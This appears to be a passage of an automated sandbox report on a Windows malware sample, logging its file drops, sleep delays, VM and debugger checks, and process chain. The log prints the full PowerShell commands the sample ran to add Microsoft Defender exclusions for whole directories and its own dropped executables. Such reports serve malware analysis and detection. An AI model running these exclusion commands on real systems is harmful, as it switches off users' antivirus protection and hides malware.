                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\Videos\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A3A69B
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A4C220
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4E6A3 VirtualQuery,GetSystemInfo,0_2_00A4E6A3
                                    Source: C:\ChainbrowserNet\serverDll.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\Videos\System.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 30000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 599871
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 599547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 3600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 598891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 598391
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 597172
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596797
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596469
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 596266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595983
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595750
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 595360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 594188
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 300000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593701
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593228
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592937
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 591641
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 591125
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 590625
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 590297
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 589906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 589281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 588844
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 588266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587902
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587563
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586156
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584840
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584050
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583028
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582531
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582100
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581984
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581864
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581725
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581621
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581487
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581240
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581031
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580738
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580610
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580485
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580358
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580235
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580037
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579899
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579773
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579669
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579422
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579312
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579203
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData\Local
                                    Source: wscript.exe, 00000001.00000003.1722778822.0000000002742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: serverDll.exe, 00000004.00000002.2356506361.000000001B9AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: serverDll.exe, 00000004.00000002.2356506361.000000001B9AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: w32tm.exe, 00000048.00000002.1903412353.0000024B410E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeAPI call chain: ExitProcess graph end nodegraph_0-23924
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A4F838
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A57DEE mov eax, dword ptr fs:[00000030h]0_2_00A57DEE
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A5C030 GetProcessHeap,0_2_00A5C030
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\Memory Compression.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\Videos\System.exeProcess token adjusted: Debug
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F9D5 SetUnhandledExceptionFilter,0_2_00A4F9D5
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A4FBCA
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A58EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A58EBD
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainbrowserNet\serverDll.exe "C:\ChainbrowserNet/serverDll.exe"Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ChainbrowserNet\backgroundTaskHost.exe "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F654 cpuid 0_2_00A4F654
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A4AF0F
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\ChainbrowserNet\serverDll.exe VolumeInformationJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
